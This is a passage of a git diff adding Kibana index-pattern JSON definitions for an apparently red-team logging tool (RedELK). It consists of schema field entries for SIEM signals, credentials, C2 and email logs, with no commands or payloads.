"searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "tls.server.not_after", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "tls.server.not_before", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.server.subject", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tls.version_protocol", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "trace.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "transaction.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "url.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "url.extension", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "url.fragment", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "url.full", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "url.full.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "url.full" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "url.original", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "url.original.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "url.original" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "url.password", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "url.path", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "url.port", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "url.query", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "url.registered_domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "url.scheme", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "url.top_level_domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "url.username", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user.email", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user.full_name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "user.full_name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "user.full_name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user.group.domain", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user.group.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user.group.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user.hash", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "user.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "user.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user_agent.device.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user_agent.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user_agent.original", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "user_agent.original.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "user_agent.original" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user_agent.os.family", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user_agent.os.full", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "user_agent.os.full.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "user_agent.os.full" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user_agent.os.kernel", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user_agent.os.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "user_agent.os.name.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "user_agent.os.name" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user_agent.os.platform", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user_agent.os.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "user_agent.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "vlan.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "vlan.name", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "vulnerability.category", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "vulnerability.classification", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "vulnerability.description", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "vulnerability.description.text", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "vulnerability.description" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "vulnerability.enumeration", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "vulnerability.id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "vulnerability.reference", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "vulnerability.report_id", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "vulnerability.scanner.vendor", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "float" + ], + "name": "vulnerability.score.base", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "float" + ], + "name": "vulnerability.score.environmental", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "float" + ], + "name": "vulnerability.score.temporal", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "vulnerability.score.version", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "vulnerability.severity", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "string" + } + ], + "timeFieldName": "@timestamp", + "title": ".siem-signals-*" + }, + "coreMigrationVersion": "7.16.3", + "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", + "migrationVersion": { + "index-pattern": "7.11.0" + }, + "references": [], + "sort": [ + 1642171872765, + 241 + ], + "type": "index-pattern", + "version": "1" + } +] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_bluecheck.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_bluecheck.json new file mode 100644 index 00000000..4719cde1 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_bluecheck.json @@ -0,0 +1,24 @@ +[ + { + "attributes": { + "fieldAttrs": "{\"bluecheck.sectools.Product\":{\"count\":1},\"bluechecktype\":{\"count\":1}}", + "fields": [], + "runtimeFieldMap": "{}", + "timeFieldName": "@timestamp", + "title": "bluecheck-*", + "typeMeta": "{}" + }, + "coreMigrationVersion": "7.16.3", + "id": "972368b0-7b90-11ec-9471-7f985bde469d", + "migrationVersion": { + "index-pattern": "7.11.0" + }, + "references": [], + "sort": [ + 1644504089054, + 308 + ], + "type": "index-pattern", + "version": "1" + } +] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_credentials.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_credentials.json new file mode 100644 index 00000000..31b65195 --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_credentials.json @@ -0,0 +1,886 @@ +[ + { + "attributes": { + "fields": [ + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "@timestamp", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "@version", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "@version.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "@version" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_id" + ], + "name": "_id", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_index" + ], + "name": "_index", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "name": "_score", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "number" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "_source" + ], + "name": "_source", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "_source" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_type" + ], + "name": "_type", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "agent.ephemeral_id", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.ephemeral_id.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "agent.ephemeral_id" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "agent.hostname", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.hostname.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "agent.hostname" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "agent.id", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.id.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "agent.id" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "agent.name", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.name.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "agent.name" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "agent.type", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.type.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "agent.type" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "agent.version", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "agent.version.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "agent.version" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "c2.log.type", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "c2.log.type.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "c2.log.type" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "c2.program", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "c2.program.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "c2.program" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "creds.credential", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "creds.credential.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "creds.credential" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "creds.host", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "creds.host.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "creds.host" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "creds.realm", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "creds.realm.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "creds.realm" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "creds.source", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "creds.source.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "creds.source" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "creds.username", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "creds.username.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "creds.username" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "ecs.version", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "ecs.version.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "ecs.version" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "event.action", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.action.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "event.action" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "event.category", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.category.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "event.category" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "event.dataset", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.dataset.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "event.dataset" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "event.kind", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.kind.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "event.kind" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "event.module", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.module.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "event.module" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "event.type", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "event.type.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "event.type" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "infra.attack_scenario", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "infra.attack_scenario.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "infra.attack_scenario" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "infra.log.type", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "infra.log.type.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "infra.log.type" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "input.type", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "input.type.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "input.type" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "log.file.path", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "log.file.path.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "log.file.path" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "long" + ], + "name": "log.offset", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "number" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "message", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "message.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "message" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "tags", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "tags.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "tags" + } + }, + "type": "string" + } + ], + "timeFieldName": "@timestamp", + "title": "credentials-*" + }, + "coreMigrationVersion": "7.16.3", + "id": "credentials", + "migrationVersion": { + "index-pattern": "7.11.0" + }, + "references": [], + "sort": [ + 1642171858664, + 19 + ], + "type": "index-pattern", + "version": "1" + } +] \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_email.json b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_email.json new file mode 100644 index 00000000..c715ea9e --- /dev/null +++ b/elkserver/docker/redelk-base/redelkinstalldata/diff/redelk_kibana_index-pattern_email.json @@ -0,0 +1,2842 @@ +[ + { + "attributes": { + "fields": [ + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "date" + ], + "name": "@timestamp", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "type": "date" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "@version", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "@version.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "@version" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_id" + ], + "name": "_id", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_index" + ], + "name": "_index", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "name": "_score", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "number" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "_source" + ], + "name": "_source", + "readFromDocValues": false, + "scripted": false, + "searchable": false, + "type": "_source" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "_type" + ], + "name": "_type", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "accept-language", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "accept-language.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "accept-language" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "arc-authentication-results", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "arc-authentication-results.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "arc-authentication-results" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "arc-message-signature", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "arc-message-signature.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "arc-message-signature" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "arc-seal", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "arc-seal.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "arc-seal" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "attackscenario", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "attackscenario.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "attackscenario" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "authentication-results", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "authentication-results-original", + "readFromDocValues": false, + "scripted": false, + "searchable": true, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "authentication-results-original.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "authentication-results-original" + } + }, + "type": "string" + }, + { + "aggregatable": true, + "count": 0, + "esTypes": [ + "keyword" + ], + "name": "authentication-results.keyword", + "readFromDocValues": true, + "scripted": false, + "searchable": true, + "subType": { + "multi": { + "parent": "authentication-results" + } + }, + "type": "string" + }, + { + "aggregatable": false, + "count": 0, + "esTypes": [ + "text" + ], + "name": "content-language", + 